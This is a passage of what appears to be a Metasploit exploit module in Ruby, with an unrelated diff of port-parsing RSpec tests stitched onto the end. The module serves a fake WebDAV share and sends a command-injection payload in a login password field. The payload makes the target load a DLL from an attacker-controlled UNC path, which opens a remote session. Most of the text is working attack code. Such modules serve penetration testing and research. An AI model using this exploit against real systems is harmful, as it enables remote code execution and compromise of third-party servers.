vprint_status("GET => REDIRECT (#{request.uri})")
resp = create_response(200, "OK")
resp.body = %Q|<html><head><meta http-equiv="refresh" content="0;URL=|
resp.body += %Q|#{@exploit_unc}#{@share_name}\\"></head><body></body></html>|
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
return
end
# Anything else is probably a request for a data file...
vprint_status("GET => DATA (#{request.uri})")
data = rand_text_alpha(4 + rand(4))
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
end
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request)
vprint_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY,' +
+ ' MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, ' +
+ 'LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
#
# PROPFIND requests sent by the WebDav Mini-Redirector
#
def process_propfind(cli, request)
path = request.uri
vprint_status("PROPFIND #{path}")
if path !~ /\/$/
if blacklisted_path?(path)
vprint_status "PROPFIND => 404 (#{path})"
resp = create_response(404, "Not Found")
resp.body = ""
cli.send_response(resp)
return
end
if path.index(".")
vprint_status "PROPFIND => 207 File (#{path})"
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml; charset="utf8"'
cli.send_response(resp)
return
else
vprint_status "PROPFIND => 301 (#{path})"
resp = create_response(301, "Moved")
resp["Location"] = path + "/"
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
return
end
end
vprint_status "PROPFIND => 207 Directory (#{path})"
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
|
if request["Depth"].to_i > 0
trail = path.split("/")
trail.shift
case trail.length
when 0
body << generate_shares(path)
when 1
body << generate_files(path)
end
else
vprint_status "PROPFIND => 207 Top-Level Directory"
end
body << "</D:multistatus>"
body.gsub!(/\t/, '')
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml; charset="utf8"'
cli.send_response(resp)
end
def generate_shares(path)
share_name = @share_name
%Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
|
end
def generate_files(path)
trail = path.split("/")
return "" if trail.length < 2
base = @basename
exts = @extensions.gsub(",", " ").split(/\s+/)
files = ""
exts.each do |ext|
files << %Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{base}.#{ext}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
<D:ishidden b:dt="boolean">1</D:ishidden>
</D:propstat>
</D:response>
|
end
files
end
def gen_timestamp(ttype=nil)
::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
end
def gen_datestamp(ttype=nil)
::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
end
# This method rejects requests that are known to break exploitation
def blacklisted_path?(uri)
share_path = "/#{@share_name}"
payload_path = "#{share_path}/#{@basename}.dll"
case uri
when payload_path
return false
when share_path
return false
else
return true
end
end
def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'),
'vars_post' =>
{
'username' => rand_text_alpha(4 + rand(4)),
'password' => rand_text_alpha(4 + rand(4))
}
})
if res && res.code == 200 && res.body =~ /PermissionRecord/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def send_injection(dll)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'),
'vars_post' =>
{
'username' => rand_text_alpha(3 + rand(3)),
'password' => "#{rand_text_alpha(3 + rand(3))}\")" +
"(load_plugin \"#{dll}\" 1)(\""
}
}, 1)
res
end
def on_new_session(session)
if service
service.stop
end
super
end
def primer
print_status("#{peer} - Sending injection...")
res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll")
if res
print_error("#{peer} - Unexpected answer")
end
end
def exploit
if datastore['UNCPATH'].blank?
@basename = rand_text_alpha(3)
@share_name = rand_text_alpha(3)
@extensions = "dll"
@system_commands_file = rand_text_alpha_lower(4)
if (datastore['SRVHOST'] == '0.0.0.0')
@myhost = Rex::Socket.source_address('50.50.50.50')
else
@myhost = datastore['SRVHOST']
end
@exploit_unc = "\\\\#{@myhost}\\"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' +
'URIPATH=/')
end
print_status("Starting Shared resource at #{@exploit_unc}#{@share_name}" +
"\\#{@basename}.dll")
begin
# The Windows Webclient needs some time...
Timeout.timeout(datastore['WEBDAV_DELAY']) { super }
rescue ::Timeout::Error
service.stop if service
end
else
# Using external SMB Server
if datastore['UNCPATH'] =~ /\\\\([^\\]*)\\([^\\]*)\\([^\\]*\.dll)/
host = $1
share_name = $2
dll_name = $3
print_status("#{peer} - Sending injection...")
res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}")
if res
print_error("#{peer} - Unexpected answer")
end
else
fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' +
'\\\\host\\shared_folder\\base_name.dll')
end
end
end
end

View File

@ -1,5 +1,6 @@
# -*- coding:binary -*-
require 'rex/socket/range_walker'
require 'spec_helper'
describe Rex::Socket do
@ -163,4 +164,35 @@ describe Rex::Socket do
end
end
describe '.portspec_to_portlist' do
subject(:portlist) { described_class.portspec_to_portlist portspec_string}
let(:portspec_string) { '-1,0-10,!2-5,!7,65530-,65536' }
it 'does not include negative numbers' do
expect(portlist).to_not include '-1'
end
it 'does not include 0' do
expect(portlist).to_not include '0'
end
it 'does not include negated numbers' do
['2', '3', '4', '5', '7'].each do |port|
expect(portlist).to_not include port
end
end
it 'does not include any numbers above 65535' do
expect(portlist).to_not include '65536'
end
it 'expands open ended ranges' do
(65530..65535).each do |port|
expect(portlist).to include port
end
end
end
end